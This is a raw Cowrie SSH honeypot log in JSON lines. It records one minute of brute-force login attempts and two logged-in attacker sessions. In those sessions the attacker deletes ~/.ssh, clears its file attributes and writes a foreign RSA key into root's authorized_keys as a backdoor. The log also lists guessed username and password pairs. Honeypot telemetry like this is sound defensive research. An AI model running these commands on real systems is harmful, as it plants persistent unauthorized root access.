{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:37:34.821604Z","src_ip":"49.247.35.31","session":"bbc4a563acb7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59182,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4fcafbe8884","protocol":"ssh","message":"New connection: 212.227.235.229:59182 (1.2.3.4:22) [session: e4fcafbe8884]","sensor":"my-vps","timestamp":"2025-09-08T13:37:41.041393Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:37:41.042310Z","src_ip":"212.227.235.229","session":"e4fcafbe8884"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:37:41.314775Z","src_ip":"212.227.235.229","session":"e4fcafbe8884"}
{"eventid":"cowrie.login.failed","username":"tcpdump","password":"tcpdump@123","message":"login attempt [tcpdump/tcpdump@123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:37:42.391900Z","src_ip":"212.227.235.229","session":"e4fcafbe8884"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":48102,"dst_ip":"1.2.3.4","dst_port":22,"session":"e3cbeb4fc6e6","protocol":"ssh","message":"New connection: 134.199.174.250:48102 (1.2.3.4:22) [session: e3cbeb4fc6e6]","sensor":"my-vps","timestamp":"2025-09-08T13:37:55.539118Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:37:55.557516Z","src_ip":"134.199.174.250","session":"e3cbeb4fc6e6"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:37:55.826985Z","src_ip":"134.199.174.250","session":"e3cbeb4fc6e6"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"qwerty123","message":"login attempt [ftpuser/qwerty123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:37:57.008481Z","src_ip":"134.199.174.250","session":"e3cbeb4fc6e6"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:37:58.287925Z","src_ip":"134.199.174.250","session":"e3cbeb4fc6e6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50720,"dst_ip":"1.2.3.4","dst_port":22,"session":"a6a2779fbb37","protocol":"ssh","message":"New connection: 212.227.235.229:50720 (1.2.3.4:22) [session: a6a2779fbb37]","sensor":"my-vps","timestamp":"2025-09-08T13:38:08.480008Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:38:08.559811Z","src_ip":"212.227.235.229","session":"a6a2779fbb37"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:38:08.954173Z","src_ip":"212.227.235.229","session":"a6a2779fbb37"}
{"eventid":"cowrie.login.success","username":"root","password":"AAA111aaa","message":"login attempt [root/AAA111aaa] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:38:09.833709Z","src_ip":"212.227.235.229","session":"a6a2779fbb37"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:38:10.176266Z","src_ip":"212.227.235.229","session":"a6a2779fbb37"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:38:10.177107Z","src_ip":"212.227.235.229","session":"a6a2779fbb37"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:38:10.177941Z","src_ip":"212.227.235.229","session":"a6a2779fbb37"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:38:10.281310Z","src_ip":"212.227.235.229","session":"a6a2779fbb37"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:38:10.607103Z","src_ip":"212.227.235.229","session":"a6a2779fbb37"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:38:10.607780Z","src_ip":"212.227.235.229","session":"a6a2779fbb37"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:38:10.739095Z","src_ip":"212.227.235.229","session":"a6a2779fbb37"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:38:10.740211Z","src_ip":"212.227.235.229","session":"a6a2779fbb37"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50732,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f21b2af991d","protocol":"ssh","message":"New connection: 212.227.235.229:50732 (1.2.3.4:22) [session: 2f21b2af991d]","sensor":"my-vps","timestamp":"2025-09-08T13:38:10.838872Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:38:10.849171Z","src_ip":"212.227.235.229","session":"2f21b2af991d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:38:10.949573Z","src_ip":"212.227.235.229","session":"2f21b2af991d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:38:11.363703Z","src_ip":"212.227.235.229","session":"2f21b2af991d"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:38:12.467540Z","src_ip":"212.227.235.229","session":"2f21b2af991d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50748,"dst_ip":"1.2.3.4","dst_port":22,"session":"042d319daad3","protocol":"ssh","message":"New connection: 212.227.235.229:50748 (1.2.3.4:22) [session: 042d319daad3]","sensor":"my-vps","timestamp":"2025-09-08T13:38:12.574287Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:38:12.575218Z","src_ip":"212.227.235.229","session":"042d319daad3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:38:12.680505Z","src_ip":"212.227.235.229","session":"042d319daad3"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:38:13.154988Z","src_ip":"212.227.235.229","session":"042d319daad3"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:38:13.259133Z","src_ip":"212.227.235.229","session":"a6a2779fbb37"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:38:13.261291Z","src_ip":"212.227.235.229","session":"042d319daad3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38962,"dst_ip":"1.2.3.4","dst_port":22,"session":"414b69b88e56","protocol":"ssh","message":"New connection: 212.227.235.229:38962 (1.2.3.4:22) [session: 414b69b88e56]","sensor":"my-vps","timestamp":"2025-09-08T13:38:22.095577Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:38:22.096278Z","src_ip":"212.227.235.229","session":"414b69b88e56"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:38:22.226865Z","src_ip":"212.227.235.229","session":"414b69b88e56"}
{"eventid":"cowrie.login.success","username":"root","password":"starwars","message":"login attempt [root/starwars] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:38:22.787348Z","src_ip":"212.227.235.229","session":"414b69b88e56"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:38:23.100816Z","src_ip":"212.227.235.229","session":"414b69b88e56"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:38:23.101513Z","src_ip":"212.227.235.229","session":"414b69b88e56"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:38:23.102374Z","src_ip":"212.227.235.229","session":"414b69b88e56"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:38:23.233688Z","src_ip":"212.227.235.229","session":"414b69b88e56"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:38:23.511491Z","src_ip":"212.227.235.229","session":"414b69b88e56"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:38:23.512167Z","src_ip":"212.227.235.229","session":"414b69b88e56"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:38:23.644486Z","src_ip":"212.227.235.229","session":"414b69b88e56"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:38:23.645464Z","src_ip":"212.227.235.229","session":"414b69b88e56"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38978,"dst_ip":"1.2.3.4","dst_port":22,"session":"52f2853bfda7","protocol":"ssh","message":"New connection: 212.227.235.229:38978 (1.2.3.4:22) [session: 52f2853bfda7]","sensor":"my-vps","timestamp":"2025-09-08T13:38:23.754837Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:38:23.755720Z","src_ip":"212.227.235.229","session":"52f2853bfda7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:38:23.872813Z","src_ip":"212.227.235.229","session":"52f2853bfda7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:38:24.381608Z","src_ip":"212.227.235.229","session":"52f2853bfda7"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:38:25.499904Z","src_ip":"212.227.235.229","session":"52f2853bfda7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38980,"dst_ip":"1.2.3.4","dst_port":22,"session":"df90c57cb517","protocol":"ssh","message":"New connection: 212.227.235.229:38980 (1.2.3.4:22) [session: df90c57cb517]","sensor":"my-vps","timestamp":"2025-09-08T13:38:25.626366Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:38:25.627057Z","src_ip":"212.227.235.229","session":"df90c57cb517"}
